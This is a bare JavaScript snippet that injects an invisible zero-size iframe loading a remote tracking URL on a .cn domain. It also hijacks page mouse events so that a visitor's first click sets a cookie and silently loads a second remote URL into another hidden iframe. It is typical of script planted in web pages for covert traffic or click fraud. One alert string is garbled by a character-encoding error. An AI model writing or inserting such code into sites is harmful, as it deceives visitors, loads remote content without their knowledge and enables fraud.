document.write("<IFRAME WIDTH=0 HEIGHT=0 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000' SRC='http://play.unionsky.cn/track/?DotID=6251'></IFRAME>");
document.write("<iframe id=yitianiframe name=yitianiframe width=0 height=0 border=0 marginwidth=0 marginheight=0 frameborder=no  src=''></iframe>");
function yitiancook()
{
var is_goopen = 1;
var exphour_open = 3; 
var exp_open = new Date(); 
exp_open.setTime(exp_open.getTime() + (exphour_open*60*60*1000));
if(is_goopen == 0) 
{
alert("cookie²»Æð×÷ÓÃ");
} 
else
{
    if(document.cookie.indexOf('yitianclick') == -1)
	  {
		  document.cookie = "yitianclick=yes" + "; expires=" + exp_open.toGMTString();
           document.getElementById("yitianiframe").src="http://play.unionsky.cn/track/?DotID=6252";
       }
}
}
function   yitianclick()   
  { 
  var evt = (event)? event:window.event;
  if(evt.button==1)  {yitiancook();}
  }
  if(document.onmousedown =='' || document.onmousedown == null) 
	{
	document.onmousedown=yitianclick; 
	}
  else
    {
	document.onmouseup=yitianclick;
	}